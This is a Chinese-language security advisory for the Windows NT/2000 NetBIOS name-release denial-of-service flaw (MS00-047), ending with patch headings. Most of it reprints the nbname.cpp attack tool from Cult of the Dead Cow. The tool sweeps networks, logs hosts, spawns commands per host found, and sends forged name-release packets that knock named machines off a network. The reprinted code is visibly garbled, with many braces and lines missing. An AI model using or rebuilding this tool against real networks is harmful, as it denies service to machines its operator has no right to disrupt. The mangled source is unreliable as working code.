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Microsoft Windows NT/2000 NetBIOS名称发布拒绝服务漏洞(MS00-047)


Microsoft Windows NT Workstation 4.0
Microsoft Windows NT 4.0 Server
Microsoft Windows 2000
CVE(CAN) ID: CVE-2000-0673

Microsoft Windows NT/2000是微软发布的非常流行的操作系统。

Windows系统中实现了NetBIOS名称服务(NBNS)协议用作Windows Internet名称服务(WINS)。根据设计,NBNS允许网络对等端帮助管理名称冲突,但这个协议是个未认证的协议,可能会被欺骗。攻击者可以滥用名称发布机制,导致其他机器认为其名称发生了冲突,这样机器就无法在网络中注册名称,或放弃已注册的名称。


<*来源:Sir Dystic (sd@cultdeadcow.com


警 告


// nbname.cpp - decodes NetBIOS name packets (UDP 137), with some other options
// Copyright 2000 Sir Dystic of the Cult of the Dead Cow - sd@cultdeadcow.com
// For Win32 should be compiled with /DWIN32 /MT (use multi-threaded libraries)
// If it complains about socklen_t try adding -Dsocklen_t=int
//  Thanks to all the people who helped me with ideas, testing and making it work
//   under Unix, especially:
//   Optyx, FreqOut, Nyar, Netmask, T12, and many others I am too lame to remember


Version history:

v1.8 - July 29, 2000
Discussed nbname at Defcon

v1.9 - August 1, 2000
Began keeping history
Added /SCAN option
Added /RETRY option
Changed /NOBOOTY option to /ALLOW and /DENY (sorry all you anal lovers)
Made commandline options case-insensitive (thanks missnglnk for being aware of
  strcasecmp() which nobody else mentioned to me)
Added /RESPOND option


#ifdef WIN32

// comment the following line to make a Winsock 1.1 compile
#define WINSOCK2

#pragma comment(linker, "/SUBSYSTEM:CONSOLE")

#define CLOSESOCKET(x) closesocket(x)
#define GETSOCKETERROR() WSAGetLastError()
#define GETRANDSEED()  GetTickCount()
#define SLEEP(x) Sleep(x)
#define CREATETHREAD(x, y) _beginthread(x, 0, y)
#define EXITTHREAD() _endthread()
#define STRICMP(x, y) stricmp(x, y)
#define STRNICMP(x, y, z) strnicmp(x, y, z)

#include <process.h>

#ifdef WINSOCK2

#include <winsock2.h>
#include <Ws2tcpip.h>

#pragma comment(lib, "ws2_32.lib")


#include <windows.h>
#include <winsock.h>
#pragma comment(lib, "wsock32.lib")


#include <time.h>
#include <io.h>


// common includes
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>

#ifndef WIN32

#include <sys/socket.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <time.h>

typedef unsigned char BYTE, *LPBYTE;
typedef unsigned short WORD, *LPWORD;
typedef unsigned long DWORD, *LPDWORD;
typedef unsigned long BOOL, *LPBOOL;
typedef int SOCKET;
typedef struct sockaddr SOCKADDR;
typedef struct sockaddr_in SOCKADDR_IN;
typedef struct hostent HOSTENT;
typedef unsigned long ULONG;
typedef unsigned short USHORT;
typedef long LONG;

#define GETRANDSEED() clock()
#define CLOSESOCKET(x) close(x)
#define SLEEP(x) usleep(x*1000)
#define STRICMP(x, y) strcasecmp(x, y)
#define STRNICMP(x, y, z) strncasecmp(x, y, z)

#define MAKEWORD(a, b)      ((WORD)(((BYTE)(a)) | ((WORD)((BYTE)(b))) << 8))
#define MAKEULONG(l, h) ((ULONG)(((USHORT)(l)) | ((ULONG)((USHORT)(h))) << 16))
#define MAKELONG(l, h)  ((LONG)MAKEULONG(l, h))

#define FALSE 0
#define TRUE 1
#define SOCKET_ERROR -1


#pragma pack(1)

#define WILDCARDNAME "*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"

// uncomment the following line to display statistics info (windows and samba boxes seem to always set this info to 0s)

BOOL g_Astat = FALSE;
BOOL g_Conflict = FALSE;
BOOL g_FindAll = FALSE;
BOOL g_Reverse = FALSE;
BOOL g_NoLocal = FALSE;
BOOL g_NoLocalNet = FALSE;

char *g_OutServsFile = NULL;
char *g_OutAllFile = NULL;
char *g_ASOutFile = NULL;
char *g_SpawnCommand = NULL;
char *g_SpawnArgs = NULL;
char *g_ScanFile = NULL;
char *g_AllowName = NULL;
char *g_DenyName = NULL;
char *g_RespondName = NULL;

DWORD g_NetmaskIP = 0;
DWORD g_SweepStartIP = 0;
DWORD g_SweepEndIP = 0;

DWORD g_PacketDelay = 100;
DWORD g_ReceiveTimeout = 0;


int g_Retries = 3;

#define ONT_BNODE 0
#define ONT_PNODE 1
#define ONT_MNODE 2
#define ONT_HNODE 3

typedef struct
    BYTE UnitID[6];                // MAC address
    BYTE Jumpers;
    BYTE TestResult;
    WORD Version;
    WORD StatsPeriod;
    WORD NumCRCs;
    WORD NumAlignmentErrors;
    WORD NumCollisions;
    WORD NumSendAborts;
    DWORD NumGoodSends;
    DWORD NumGoodRcvs;
    WORD NumRetransmits;
    WORD NumResourceConditions;
    WORD NumFreeCommandBlocks;
    WORD NumCommandBlocks;
    WORD NumMaxCommandBlocks;
    WORD NumPendingSessions;
    WORD NumMaxPendingSessions;
    WORD NumMaxTotalSessions;
    WORD SessionDataPacketSize;

typedef struct
    WORD Reserved:13;
    WORD ONT:2;            // Owner Node Type:
                        //  00 = B node
                        //  01 = P node
                        //  10 = M node
                        //  11 = Reserved for future use
                        // For registration requests this is the
                        // claimant's type.
                        // For responses this is the actual owner's type.
    WORD fGroup:1;        // Group Name Flag.
                        // If one (1) then the RR_NAME is a GROUP NetBIOS name.
                        // If zero (0) then the RR_NAME is a UNIQUE NetBIOS name.

typedef struct
    WORD Reserved:9;    // Reserved for future use.  Must be zero (0).
    WORD fPermanent:1;    // Permanent Name Flag.  If one (1) then entry is for the permanent node name.  
                        //  Flag is zero (0) for all other names.
    WORD fActive:1;        // Active Name Flag.  All entries have this flag set to one (1).
    WORD fConflict:1;    // Conflict Flag.  If one (1) then name on this node is in conflict.
    WORD fDeregister:1;    // Deregister Flag.  If one (1) then this name is in the process of being deleted.
    WORD OwnerType:2;    // Owner Node Type:
                        //  00 = B node
                        //  01 = P node
                        //  10 = M node
                        //  11 = Reserved for future use
    WORD fGroupName:1;    // Group Name Flag.
                        //  If one (1) then the name is a GROUP NetBIOS name.
                        //  If zero (0) then it is a UNIQUE NetBIOS name.

typedef struct
    char Name[15];        // uncompressed name
    BYTE BinVal;        // binary value
    WORD Flags;            // flags

#define RCODE_FMTERR    0x1
#define RCODE_SRVERR    0x2
#define RCODE_NAMERR    0x3
#define RCODE_IMPERR    0x4
#define RCODE_RFSERR    0x5
#define RCODE_ACTERR    0x6
#define RCODE_CFTERR    0x7

typedef struct
    WORD Type;            // type of recource record
    WORD Class;            // class of resource record (always IN)
    DWORD TTL;            // Time to live
    WORD RDLength;        // length of following resource data

#define RRTYPE_A        0x0001
#define RRTYPE_NS        0x0002
#define RRTYPE_NULL        0x000A
#define RRTYPE_NB        0x0020
#define RRTYPE_NBSTAT    0x0021

#define RRCLASS_IN        0x0001

typedef struct
    WORD RCode   : 4;            // response code
    WORD fNM_B   : 1;            // Broadcast flag
    WORD fNM_00  : 2;            // reserved, always 0
    WORD fNM_RA  : 1;            // Recursion Available flag
    WORD fNM_RD  : 1;            // Recursion Desired flag
    WORD fNM_TC  : 1;            // Truncation flag
    WORD fNM_AA  : 1;            // Authoratative answer flag
    WORD OpCode  : 4;            // Operation code
    WORD fResponse:1;            // Response flag

typedef struct {
    WORD TransactionID;            // transaction id, responses match original packet, requests are random/sequential
    WORD OpcodeFlagsRcode;        // opcode, flags and rcode
    WORD QDCount;                // number of questions
    WORD ANCount;                // number of answer resource records
    WORD NSCount;                // number of name service resource records
    WORD ARCount;                // number of athoratative resource records

#define OPCODE_QUERY        0
#define OPCODE_RELEASE        6
#define OPCODE_WACK            7
#define OPCODE_REFRESH        8

typedef struct{
    BYTE Name[34];        // compressed name
    WORD Type;            // question type
    WORD Class;            // question class (always type IN - Internet)

#define QUESTION_TYPE_NB        0x0020    // general name request
#define QUESTION_TYPE_NBSTAT    0x0021    // stats request

#define QUESTION_CLASS_IN        0x0001    // internet class

unsigned char hexvals[16] = {'0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F'};

void PrintNetbiosName(unsigned char *name)
    BYTE BinVal;
    char PrintName[16];

    memcpy(PrintName, name, 15);
    PrintName[15] = 0;

    BinVal = name[15];

    printf("%15s <%02x>", PrintName, BinVal);

int NetbiosNameToString(char *dest, const BYTE *src, int PacketLeft)
    int y;
    static unsigned char Name[32];
    unsigned char UncompressedName[256];
    unsigned char hexbuf[3];
    char *ptr;
    BYTE len;

    // get length of string
    len = *src;

    if (len & 0xC0) // name pointer or other
        len = 0;
        // just return last name read
    } else {
        if (len <= PacketLeft)
            puts("[Short name, aborting]");
            return 0;

        memset(UncompressedName, 0, sizeof(UncompressedName));

        memset(Name, ' ', sizeof(Name) );

        memcpy(UncompressedName, src+1, len);

        for (y = 0; y < 16; y++)
            hexbuf[0] = hexvals[UncompressedName[y*2] - 'A'];
            hexbuf[1] = hexvals[UncompressedName[y*2+1] - 'A'];
            hexbuf[2] = 0;
            Name[y] = (BYTE)strtoul((char *)hexbuf, &ptr, 16);

    memcpy(dest, (const char *)Name , 16);

    return (int)(len+2);

int StringToNetbiosName(char *dest, const char *src, BYTE binval)
    int x, y;
    unsigned char Name[16];
    unsigned char UncompressedName[256];
    char hexbuf[2];

    // set name to all zeros
    memset(Name, 0, sizeof(Name));

    // get length of name
    x = strlen(src);

    // truncate at 15th char
    if (x > 15) x = 15;

    // copy up to 15 chars leaving the rest space padded
    memcpy(Name, src, x);

    // uppercase the name
    Name[15] = 0;
    for (y = 0; y < 15; y++)
        Name[y] = toupper((int)Name[y]);

    // set 16th binary char
    Name[15] = binval;

    UncompressedName[0] = 32;

    // convert each char to hex
    for (x = 0; x < 16; x++)
        sprintf((char *)&UncompressedName[(x*2)+1], "%02X", (DWORD)Name[x] );

    // add 'A' to each char
    for (x = 1; x <= 32; x++)
        char *ptr;

        hexbuf[0] = UncompressedName[x];
        hexbuf[1] = 0;
        UncompressedName[x] = 'A' + (BYTE)strtoul(hexbuf, &ptr, 16);;

    UncompressedName[33] = 0;
#if 0
    // add SCOPE_ID
    UncompressedName[33] = 7;
    memcpy((char *)&UncompressedName[34], "NETBIOS", 7);

    UncompressedName[41] = 3;
    memcpy((char *)&UncompressedName[42], "COM", 3);

    // set the length
    x = 34;

    memcpy(dest, UncompressedName, x);

    return x;


DWORD FormPacket(unsigned char *buff, WORD TranID, BYTE Opcode, char *QuestionName, WORD QuestionType, BOOL fResponse, BOOL fBroadcast, BOOL fTruncated, BOOL fRecursionAvailable, BOOL fRecursionDesired, BOOL fAuthoratativeAnswer, WORD RCode, WORD QDCount, WORD ANCount, WORD NSCount, WORD ARCount, DWORD TargetIP, BOOL fGroup, BYTE ONT)
    NBFLAGS nbflags;
    PNBNAMEHEADER pnbnameheader = (PNBNAMEHEADER)buff;
    BYTE *ptr, *firstnameptr = NULL;
    DWORD d;
    WORD w;

    memset(pnbnameheader, 0, sizeof(NBNAMEHEADER) );

    pnbnameheader->TransactionID = TranID;    // Transaction ID

    Wcode.fResponse = fResponse;        // request not response
    Wcode.OpCode = Opcode;                // operation code (command)
    Wcode.fNM_00 = 0;                    // always 0
    Wcode.fNM_B = fBroadcast;            // broadcast
    Wcode.fNM_RA = fRecursionAvailable;    // always 0 for requests
    Wcode.fNM_RD = fRecursionDesired;    // no recursion requested
    Wcode.fNM_TC = fTruncated;            // not truncated
    Wcode.fNM_AA = fAuthoratativeAnswer;// always 0 for requests
    Wcode.RCode = RCode;

    pnbnameheader->OpcodeFlagsRcode = htons(*((WORD*)&Wcode));

    pnbnameheader->QDCount = htons(QDCount);
    pnbnameheader->ANCount = htons(ANCount);
    pnbnameheader->ARCount = htons(ARCount);
    pnbnameheader->NSCount = htons(NSCount);

    ptr = (BYTE *)(pnbnameheader + 1);

    if (QDCount > 0)
        PQUESTION pquestion = (PQUESTION)ptr;

        StringToNetbiosName((char *)pquestion->Name, QuestionName, QuestionName[15]);

        firstnameptr = pquestion->Name;

        pquestion->Type = htons(QuestionType);
        pquestion->Class = htons(QUESTION_CLASS_IN);
        ptr += sizeof(QUESTION);

    if (ANCount > 0)
        d = StringToNetbiosName((char *)ptr, QuestionName, QuestionName[15]);

        ptr += d;


        presrecordheader->Class = htons(RRCLASS_IN);
        presrecordheader->RDLength = htons(6);
        presrecordheader->TTL = 0;
        presrecordheader->Type = htons(RRTYPE_NB);

        ptr += sizeof(RESOURCERECORDHEADER);

        nbflags.fGroup = fGroup;
        nbflags.Reserved = 0;
        nbflags.ONT = ONT;
        memcpy(&w, &nbflags, sizeof(WORD) );

        w = htons(w);

        memcpy(ptr, &w, sizeof(WORD));

        ptr += sizeof(WORD);

        *((DWORD *)ptr) = TargetIP;

        ptr += sizeof(DWORD);

    if (ARCount > 0)
        if (firstnameptr == NULL)
            d = StringToNetbiosName((char *)ptr, QuestionName, QuestionName[15]);
            ptr += d;
            *((WORD *)ptr) = htons(0xC000 | (firstnameptr - buff));


        presrecordheader->Class = htons(RRCLASS_IN);
        presrecordheader->RDLength = htons(6);
        presrecordheader->TTL = 0;
        presrecordheader->Type = htons(RRTYPE_NB);

        ptr += sizeof(RESOURCERECORDHEADER);

        nbflags.fGroup = fGroup;
        nbflags.Reserved = 0;
        nbflags.ONT = ONT;
        memcpy(&w, &nbflags, sizeof(WORD) );

        w = htons(w);

        memcpy(ptr, &w, sizeof(WORD));

        ptr += sizeof(WORD);

        *((DWORD *)ptr) = TargetIP ;

        ptr += sizeof(DWORD);

    return (DWORD)(ptr - buff);

DWORD ProcessResourceRecord(const BYTE *ptr, int Type, SOCKET sock, LPSOCKADDR_IN psockaddr, int PacketLeft)
    BYTE outbuff[1024];
    char NameBuff[256];
    WORD w, RRType, RRClass, RRRDLength, NameFlags, TranID;
    BYTE NumNames;
    BYTE BinVal;
    NBFLAGS nbflags;
    int x;

    d = NetbiosNameToString(NameBuff, ptr, PacketLeft);

    if (d == 0) return 0;

    PrintNetbiosName((BYTE *)NameBuff);
    ptr += d;

    if (PacketLeft - d < sizeof(RESOURCERECORDHEADER) || PacketLeft - d < sizeof(RESOURCERECORDHEADER) + ntohs(((PRESOURCERECORDHEADER)ptr)->RDLength) )
        puts("[Short record, aborting]");
        return 0;


    RRType = ntohs(presrecordheader->Type);
    RRClass = ntohs(presrecordheader->Class);
    RRTTL = ntohl(presrecordheader->TTL);
    RRRDLength = ntohs(presrecordheader->RDLength);

    ptr = (LPBYTE)(presrecordheader+1);

    switch (RRType)
    case RRTYPE_A:
        printf("IP Address Resource Record:\n");
    case RRTYPE_NS:
        printf("Name Service Resource Record:\n");
    case RRTYPE_NULL:
        printf("NULL Resource Record:\n");
    case RRTYPE_NB    :
        printf("NetBIOS Name Service Resource Record:\n");

    if (g_FindAll && RRType == RRTYPE_NB && memcmp(NameBuff, WILDCARDNAME, 16) == 0)
        d = FormPacket(outbuff, rand(), OPCODE_QUERY, WILDCARDNAME, QUESTION_TYPE_NBSTAT, FALSE, TRUE, FALSE, FALSE, FALSE, FALSE, 0, 1, 0,    0, 0, 0, 0, ONT_BNODE);

        sendto(sock, (const char *)outbuff, d, 0, (LPSOCKADDR)psockaddr, sizeof(SOCKADDR_IN) );

        printf(" **** NBSTAT request packet sent\n");


    switch (RRType)
    case RRTYPE_A:
    case RRTYPE_NS:
    case RRTYPE_NULL:
    case RRTYPE_NB    :

        for (x = 0; x < RRRDLength / 6; x++)
            memcpy(&w, ptr, sizeof(w) );
            w = ntohs(w);
            memcpy(&nbflags, &w, sizeof(w) );
            ptr += sizeof(WORD);

            printf("Owner Node Type: ");
            switch (nbflags.ONT)
            case ONT_BNODE:
                printf("B-NODE ");
            case ONT_PNODE:
                printf("P-NODE ");
            case ONT_MNODE:
                printf("M-NODE ");
            case ONT_HNODE:
                printf("H-NODE ");

            printf("  ");

            if (nbflags.fGroup)
                printf("GROUP  ");
                printf("UNIQUE ");

            printf("  -  ");

            printf("IP: %u.%u.%u.%u", *ptr, *(ptr+1), *(ptr+2),*(ptr+3));




            FILE *outfile = NULL;

            printf("Node Status Resource Record:\n");
            NumNames = *ptr;
            PNETBIOSNAME pnetbiosname = (PNETBIOSNAME)ptr;

            if (NumNames > 0 && g_OutAllFile != NULL)
                outfile = fopen(g_OutAllFile , "at");
                if (outfile != NULL)
                    BinVal = pnetbiosname->BinVal;
                    pnetbiosname->BinVal = 0;
                    fprintf(outfile, "%s %s\n", inet_ntoa(psockaddr->sin_addr), pnetbiosname->Name);
                    pnetbiosname->BinVal = BinVal;
                    printf(" **** Machine added to %s\n", g_OutAllFile );
                    outfile = NULL;

            if (g_ASOutFile != NULL)
                outfile = fopen(g_ASOutFile, "at");
                if (outfile != NULL)
                    time_t curtime = time(NULL);
                    fprintf(outfile, "ASTAT response from %s at %s", inet_ntoa(psockaddr->sin_addr), ctime(&curtime) );

            for (w = 0; w < NumNames; w++)
                char *tptr;
                BinVal = pnetbiosname->BinVal;
                pnetbiosname->BinVal = 0;

                printf("%s <%02x>  ", pnetbiosname->Name, BinVal );

                if (outfile != NULL)
                    fprintf(outfile, "%s <%02x>  ", pnetbiosname->Name, BinVal );

                pnetbiosname->BinVal = BinVal;

                NameFlags = ntohs(pnetbiosname->Flags);
                memcpy(&NameFlagsStruct, &NameFlags, sizeof(NameFlags) );
                if (NameFlagsStruct.fActive)
                    tptr = "ACTIVE   ";
                    tptr = "INACTIVE ";

                printf("%s", tptr);
                if (outfile != NULL)
                    fprintf(outfile, "%s", tptr);

                if (NameFlagsStruct.fGroupName)
                    tptr = "GROUP  ";
                    tptr = "UNIQUE ";

                printf("%s", tptr);
                if (outfile != NULL)
                    fprintf(outfile, "%s", tptr);

                if (NameFlagsStruct.fPermanent)
                    tptr = "PERMANENT ";
                    tptr = "NOTPERM   ";

                printf("%s", tptr);
                if (outfile != NULL)
                    fprintf(outfile, "%s", tptr);

                if (NameFlagsStruct.fConflict)
                    tptr = "INCONFLICT ";
                    tptr = "NOCONFLICT ";

                printf("%s", tptr);
                if (outfile != NULL)
                    fprintf(outfile, "%s", tptr);

                if (NameFlagsStruct.fDeregister)
                    tptr = "DEREGISTERED ";
                    tptr = "NOTDEREGED   ";

                printf("%s", tptr);
                if (outfile != NULL)
                    fprintf(outfile, "%s", tptr);

                switch (NameFlagsStruct.OwnerType)
                case ONT_BNODE:
                    tptr = "B-NODE ";
                case ONT_PNODE:
                    tptr = "P-NODE ";
                case ONT_MNODE:
                    tptr = "M-NODE ";
                case ONT_HNODE:
                    tptr = "H-NODE ";

                printf("%s\n", tptr);
                if (outfile != NULL)
                    fprintf(outfile, "%s\n", tptr);

                if (!NameFlagsStruct.fGroupName && BinVal == 0x20 )
                    if (g_OutServsFile != NULL)
                        FILE *outfile2 = fopen(g_OutServsFile, "at");
                        if (outfile2 != NULL)
                            pnetbiosname->BinVal = 0;

                            fprintf(outfile2, "%s %s\n", inet_ntoa(psockaddr->sin_addr), pnetbiosname->Name);

                            pnetbiosname->BinVal = BinVal;


                            printf(" **** Machine added to %s\n", g_OutServsFile );

                    if (g_SpawnCommand != NULL)
                        char buff[1024];

                        pnetbiosname->BinVal = 0;

                        sprintf(buff, "%s", inet_ntoa(psockaddr->sin_addr));
#ifdef WIN32

                        if (_spawnlpe(_P_NOWAIT, g_SpawnCommand, g_SpawnCommand, g_SpawnArgs, pnetbiosname->Name, buff, NULL, NULL) == -1)
                            printf(" *** Error spawning \"%s\"\n", g_SpawnCommand);
                            printf(" **** Spawned \"%s\"\n", g_SpawnCommand);
                        if (fork() == 0)
                            if (execlp(g_SpawnCommand, g_SpawnCommand, g_SpawnArgs, pnetbiosname->Name, buff, NULL) == -1 )
                                printf(" *** Error spawning \"%s %s %s %s\"\n", g_SpawnCommand, g_SpawnArgs, pnetbiosname->Name, buff );

                        pnetbiosname->BinVal = BinVal;

                if (g_Conflict && !NameFlagsStruct.fConflict )
                    TranID = rand();

                    d = FormPacket(outbuff, TranID, OPCODE_RELEASE, pnetbiosname->Name, QUESTION_TYPE_NB, FALSE, FALSE, FALSE, FALSE, FALSE, FALSE, 0, 1, 0, 0, 1, psockaddr->sin_addr.s_addr, NameFlagsStruct.fGroupName, NameFlagsStruct.OwnerType);

                    sendto(sock, (const char *)outbuff, d, 0, (LPSOCKADDR)psockaddr, sizeof(SOCKADDR_IN) );

                    printf(" **** Name release sent to %s\n", inet_ntoa(psockaddr->sin_addr) );


            PNETBIOSSTATS pnetbiosstats = (PNETBIOSSTATS)pnetbiosname;

            printf("MAC Address:             %02X-%02X-%02X-%02X-%02X-%02X\n", pnetbiosstats->UnitID[0], pnetbiosstats->UnitID[1], pnetbiosstats->UnitID[2], pnetbiosstats->UnitID[3], pnetbiosstats->UnitID[4], pnetbiosstats->UnitID[5] );
            if (outfile != NULL)
                fprintf(outfile, "MAC Address:             %02X-%02X-%02X-%02X-%02X-%02X\n\n", pnetbiosstats->UnitID[0], pnetbiosstats->UnitID[1], pnetbiosstats->UnitID[2], pnetbiosstats->UnitID[3], pnetbiosstats->UnitID[4], pnetbiosstats->UnitID[5] );

            printf("Jumpers:                 0x%02x\n", pnetbiosstats->Jumpers);
            printf("Test result:             0x%02x\n", pnetbiosstats->TestResult);
            printf("Version:                 %d.%d\n", HIBYTE(pnetbiosstats->Version), LOBYTE(pnetbiosstats->Version) );
            printf("Stats period:            0x%04x\n", ntohs(pnetbiosstats->StatsPeriod) );
            printf("Num CRCs:                %u\n", ntohs(pnetbiosstats->NumCRCs ) );
            printf("Num Alignment errs:      %u\n", ntohs(pnetbiosstats->NumAlignmentErrors ) );
            printf("Num Collisions:          %u\n", ntohs(pnetbiosstats->NumCollisions ) );
            printf("Num Send Aborts:         %u\n", ntohs(pnetbiosstats->NumSendAborts ) );
            printf("Num Good Sends:          %u\n", ntohl(pnetbiosstats->NumGoodSends ) );
            printf("Num Good Receives:       %u\n", ntohl(pnetbiosstats->NumGoodRcvs ) );
            printf("Num Retransmits:         %u\n", ntohs(pnetbiosstats->NumRetransmits ) );
            printf("Num Resource Conditions: %u\n", ntohs(pnetbiosstats->NumResourceConditions ) );
            printf("Free Command Blocks:     %u\n", ntohs(pnetbiosstats->NumFreeCommandBlocks ) );
            printf("Total Command Blocks:    %u\n", ntohs(pnetbiosstats->NumCommandBlocks ) );
            printf("Max Command Blocks       %u\n", ntohs(pnetbiosstats->NumMaxCommandBlocks ) );
            printf("Pending Sessions:        %u\n", ntohs(pnetbiosstats->NumPendingSessions ) );
            printf("Max Pending Sessions:    %u\n", ntohs(pnetbiosstats->NumMaxPendingSessions ) );
            printf("Max Total Sessions:      %u\n", ntohs(pnetbiosstats->NumMaxTotalSessions ) );
            printf("Session Data Packet Size:%u\n", ntohs(pnetbiosstats->SessionDataPacketSize ) );

            if (outfile != NULL)
                outfile = NULL;

        printf("Unknown resource record type: 0x%04x\n", RRType);

    return d + RRRDLength + sizeof(RESOURCERECORDHEADER);

DWORD ProcessPacket(char *buff, int packetsize, SOCKET sock, LPSOCKADDR_IN psockaddr)
    char NameBuff[256];
    PNBNAMEHEADER pnbnameheader = (PNBNAMEHEADER)buff;
    WORD w, QDCount, ANCount, NSCount, ARCount, RCode, OPCode;


MS00-047:Patch Available for "NetBIOS Name Server Protocol Spoofing"

Windows 2000:

Windows NT 4.0 Workstation, Server和Server, Enterprise Edition:

Windows NT 4.0 Server, Terminal Server Edition:
